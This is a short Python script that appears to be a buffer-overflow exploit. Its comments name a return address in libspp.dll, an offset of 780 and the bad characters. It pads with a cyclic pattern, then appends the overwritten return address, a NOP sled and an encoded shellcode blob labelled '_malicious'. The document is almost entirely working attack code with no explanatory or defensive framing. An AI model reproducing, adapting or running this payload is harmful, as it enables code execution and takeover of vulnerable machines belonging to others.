# return address: 0x10090C83 at libspp.dll
# offset: 780
# bad chars: \x00 

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"

return_address = "\x83\x0C\x09\x10"

_malicious = (
"\xdb\xd0\xd9\x74\x24\xf4\xb8\x1b\x9f\xa8\x5e\x5e\x31\xc9"
"\xb1\x52\x31\x46\x17\x83\xc6\x04\x03\x5d\x8c\x4a\xab\x9d"
"\x5a\x08\x54\x5d\x9b\x6d\xdc\xb8\xaa\xad\xba\xc9\x9d\x1d"
"\xc8\x9f\x11\xd5\x9c\x0b\xa1\x9b\x08\x3c\x02\x11\x6f\x73"
"\x93\x0a\x53\x12\x17\x51\x80\xf4\x26\x9a\xd5\xf5\x6f\xc7"
"\x14\xa7\x38\x83\x8b\x57\x4c\xd9\x17\xdc\x1e\xcf\x1f\x01"
"\xd6\xee\x0e\x94\x6c\xa9\x90\x17\xa0\xc1\x98\x0f\xa5\xec"
"\x53\xa4\x1d\x9a\x65\x6c\x6c\x63\xc9\x51\x40\x96\x13\x96"
"\x67\x49\x66\xee\x9b\xf4\x71\x35\xe1\x22\xf7\xad\x41\xa0"
"\xaf\x09\x73\x65\x29\xda\x7f\xc2\x3d\x84\x63\xd5\x92\xbf"
"\x98\x5e\x15\x6f\x29\x24\x32\xab\x71\xfe\x5b\xea\xdf\x51"
"\x63\xec\xbf\x0e\xc1\x67\x2d\x5a\x78\x2a\x3a\xaf\xb1\xd4"
"\xba\xa7\xc2\xa7\x88\x68\x79\x2f\xa1\xe1\xa7\xa8\xc6\xdb"
"\x10\x26\x39\xe4\x60\x6f\xfe\xb0\x30\x07\xd7\xb8\xda\xd7"
"\xd8\x6c\x4c\x87\x76\xdf\x2d\x77\x37\x8f\xc5\x9d\xb8\xf0"
"\xf6\x9e\x12\x99\x9d\x65\xf5\x66\xc9\x65\x26\x0f\x08\x65"
"\x29\x74\x85\x83\x43\x9a\xc0\x1c\xfc\x03\x49\xd6\x9d\xcc"
"\x47\x93\x9e\x47\x64\x64\x50\xa0\x01\x76\x05\x40\x5c\x24"
"\x80\x5f\x4a\x40\x4e\xcd\x11\x90\x19\xee\x8d\xc7\x4e\xc0"
"\xc7\x8d\x62\x7b\x7e\xb3\x7e\x1d\xb9\x77\xa5\xde\x44\x76"
"\x28\x5a\x63\x68\xf4\x63\x2f\xdc\xa8\x35\xf9\x8a\x0e\xec"
"\x4b\x64\xd9\x43\x02\xe0\x9c\xaf\x95\x76\xa1\xe5\x63\x96"
"\x10\x50\x32\xa9\x9d\x34\xb2\xd2\xc3\xa4\x3d\x09\x40\xc4"
"\xdf\x9b\xbd\x6d\x46\x4e\x7c\xf0\x79\xa5\x43\x0d\xfa\x4f"
"\x3c\xea\xe2\x3a\x39\xb6\xa4\xd7\x33\xa7\x40\xd7\xe0\xc8"
"\x40"
)

shellcode = buffer + return_address + '\x90' * 16 + _malicious